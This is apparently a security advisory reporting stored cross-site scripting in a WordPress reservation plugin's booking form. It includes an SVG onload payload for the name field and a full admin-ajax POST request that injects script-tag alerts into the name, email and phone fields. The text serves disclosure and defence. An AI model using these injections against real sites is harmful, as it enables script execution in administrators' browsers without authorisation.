The plugin does not sanitise and escape some of the reservation user inputs, allowing unauthenticated attackers to perform Cross-Site Scripting attacks logged in admin viewing the malicious reservation made
As unauthenticated, make a reservation (ie on a page where the [reservation_form] is embed) and put the following payload in the FullName: a a"><svg/onload=alert(/XSS/)>
The Phone Number and Email are also vulnerable (they are only validated client side):
POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 428
Connection: close
action=kechup_rr_bookings_interact&validation_key=680bed9c59&operation=create&data=%5b%225%22%2c%2211%22%2c%2211%3a11%22%2c%2213%3a11%3a00%22%2c%222022-08-07%22%2c%22%3cscript%3ealert(%5c%22Stored%20XSS%20full%20name%5c%22)%3c%2fscript%3e%22%2c%22%3cscript%3ealert(%5c%22Stored%20XSS%20mail%5c%22)%3c%2fscript%3e%22%2c%222%22%2c%22%3cscript%3ealert(%5c%22Stored%20XSS%20phone%20number%5c%22)%3c%2fscript%3e%22%2c%22pending%22%5d